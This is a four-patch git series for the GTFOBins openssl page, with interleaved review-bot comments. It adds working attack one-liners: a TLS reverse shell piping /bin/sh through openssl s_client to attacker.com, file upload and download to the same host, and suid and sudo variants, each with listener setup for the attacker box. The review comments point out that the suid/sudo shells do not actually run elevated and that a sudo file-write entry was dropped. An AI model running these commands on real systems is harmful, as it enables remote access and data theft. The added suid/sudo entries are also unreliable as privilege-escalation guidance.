From cdb4576c85c5300bddedc60b96aca69c1615dc48 Mon Sep 17 00:00:00 2001
From: Roman Mueller
Date: Tue, 5 Mar 2019 09:37:52 +0100
Subject: [PATCH 1/4] Add reverse-shell, file-upload and file-download.

---
 _gtfobins/openssl.md | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md
index 107b0f6..5c7721c 100644
--- a/_gtfobins/openssl.md
+++ b/_gtfobins/openssl.md
@@ -1,5 +1,25 @@
 ---
 functions:
+  reverse-shell:
+  - description: Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345` on the attacker box to receive the shell. Communication between attacker and target will be encrypted.
+    code: |
+      RHOST=attacker.com
+      RPORT=12345
+      mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
+  file-upload:
+  - description: Send a file to a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save` on the attacker box to collect the file.
+    code: |
+      RHOST=attacker.com
+      RPORT=12345
+      LFILE=file_to_send
+      openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"
+  file-download:
+  - description: Fetch a file from a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send` on the attacker box to send the file.
+    code: |
+      RHOST=attacker.com
+      RPORT=12345
+      LFILE=file_to_save
+      openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"
   file-write:
   - code: |
       LFILE=file_to_write

From e1a02558ecd1e70ab9768a4713ca370824a56a62 Mon Sep 17 00:00:00 2001
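Review bot: The three descriptions in this hunk promise that the transmission "will be encrypted", but none of the `openssl s_client` lines verifies the server certificate, so the channel is encrypted yet unauthenticated, and the TLS handshake to `$RPORT` against a self-signed certificate on an arbitrary port is still visible to network monitoring — only the payload is hidden. I would state this precisely, e.g. `Communication between attacker and target will be encrypted (but not authenticated: the client does not verify the server certificate).`, and reuse the same sentence in file-upload and file-download so the caveat is consistent. A minor style point in the same blocks: `$RHOST:$RPORT` is left unquoted while `"$LFILE"` is quoted.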
From: Andrea Cardaci
Date: Wed, 6 Mar 2019 13:53:52 +0100
Subject: [PATCH 2/4] Refactor openssl descriptions

---
 _gtfobins/openssl.md | 24 +++++++++++++++++++++---
 1 file changed, 21 insertions(+), 3 deletions(-)

diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md
index 5c7721c..e3e77d0 100644
--- a/_gtfobins/openssl.md
+++ b/_gtfobins/openssl.md
@@ -1,20 +1,38 @@
 ---
 functions:
   reverse-shell:
-  - description: Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345` on the attacker box to receive the shell. Communication between attacker and target will be encrypted.
+  - description: |
+      To receive the shell run the following on the attacker box:
+
+          openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+          openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
+
+      Communication between attacker and target will be encrypted.
     code: |
       RHOST=attacker.com
       RPORT=12345
       mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
   file-upload:
-  - description: Send a file to a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save` on the attacker box to collect the file.
+  - description: |
+      To collect the file run the following on the attacker box:
+
+          openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+          openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save
+
+      Send a file to a TCP port, transmission will be encrypted.
     code: |
       RHOST=attacker.com
       RPORT=12345
       LFILE=file_to_send
       openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"
   file-download:
-  - description: Fetch a file from a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send` on the attacker box to send the file.
+  - description: |
+      To send the file run the following on the attacker box:
+
+          openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+          openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send
+
+      Fetch a file from a TCP port, transmission will be encrypted.
     code: |
       RHOST=attacker.com
       RPORT=12345

From 60af77428871e806695f85601d8a85f97bb53ac4 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Wed, 6 Mar 2019 13:54:16 +0100
Subject: [PATCH 3/4] Add -no_ign_eof to exit nicely when possible to openssl

---
 _gtfobins/openssl.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md
index e3e77d0..7e0e424 100644
--- a/_gtfobins/openssl.md
+++ b/_gtfobins/openssl.md
@@ -11,7 +11,7 @@ functions:
     code: |
       RHOST=attacker.com
       RPORT=12345
-      mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
+      mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
   file-upload:
   - description: |
       To collect the file run the following on the attacker box:
@@ -24,7 +24,7 @@ functions:
       RHOST=attacker.com
       RPORT=12345
       LFILE=file_to_send
-      openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"
+      openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT < "$LFILE"
   file-download:
   - description: |
       To send the file run the following on the attacker box:

From 58e517563c70c5fa65e52714680d7ba7747342ae Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Wed, 6 Mar 2019 14:08:42 +0100
Subject: [PATCH 4/4] Add suid/sudo accordingly to openssl

---
 _gtfobins/openssl.md | 26 +++++++++++++++++++++++---
 1 file changed, 23 insertions(+), 3 deletions(-)

diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md
index 7e0e424..3f0dc35 100644
--- a/_gtfobins/openssl.md
+++ b/_gtfobins/openssl.md
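Review bot: In the rewritten file-upload and file-download descriptions the sentence that states what the entry does (`Send a file to a TCP port, transmission will be encrypted.` / `Fetch a file from a TCP port, transmission will be encrypted.`) now trails the listener instructions, so a reader meets the attacker-box commands before learning what the entry is for, and the closing line mixes purpose with the encryption caveat, unlike reverse-shell where the closing line is the caveat alone. Move the purpose sentence to the first line of each block scalar, ahead of `To collect the file run the following on the attacker box:` / `To send the file run the following on the attacker box:`, and end all three entries with the same caveat sentence. The file-download `code` block continues past the end of this hunk.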
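Review bot: `-no_ign_eof` is added to the reverse-shell and file-upload clients but not to the file-download client that follows the second hunk, and nothing in the file records why; the subject's "when possible" suggests the omission is deliberate (presumably because that entry does not redirect stdin — please confirm), but the next editor is likely to "harmonise" it. A one-line remark in the file-download description, e.g. `-no_ign_eof is intentionally omitted in this entry.`, would preserve the intent.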
@@ -52,11 +52,31 @@ functions:
       LFILE=file_to_read
       openssl enc -in "$LFILE"
   suid:
+  - description: |
+      To receive the shell run the following on the attacker box:
+
+          openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+          openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
+
+      Communication between attacker and target will be encrypted.
+    code: |
+      RHOST=attacker.com
+      RPORT=12345
+      mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
+
   - code: |
       LFILE=file_to_write
       echo DATA | openssl enc -out "$LFILE"
   sudo:
-  - code: |
-      LFILE=file_to_write
-      echo DATA | sudo openssl enc -out "$LFILE"
+  - description: |
+      To receive the shell run the following on the attacker box:
+
+          openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
+          openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
+
+      Communication between attacker and target will be encrypted.
+    code: |
+      RHOST=attacker.com
+      RPORT=12345
+      mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
 ---
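Review bot: The new suid and sudo reverse-shell items do not produce an elevated shell: in `mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client ...` (and the `sudo openssl` twin) only the `s_client` process carries the binary's privileges, while `/bin/sh -i` is a separate process started by the caller, so whatever reaches the listener runs with the caller's rights. Either say so in both descriptions, e.g. `The shell runs with the privileges of the calling user; only the s_client transport is privileged.`, or leave these items out of the suid/sudo sections. Separately, the hunk deletes the existing sudo file-write item (`- code: |` / `LFILE=file_to_write` / `echo DATA | sudo openssl enc -out "$LFILE"`) instead of keeping it beside the new one, whereas suid retains its file-write item; the subject says "add", so this looks unintended and those three lines should be restored under sudo. The blank line that appears to be inserted between the two suid items has no counterpart elsewhere in the visible sections and can be dropped.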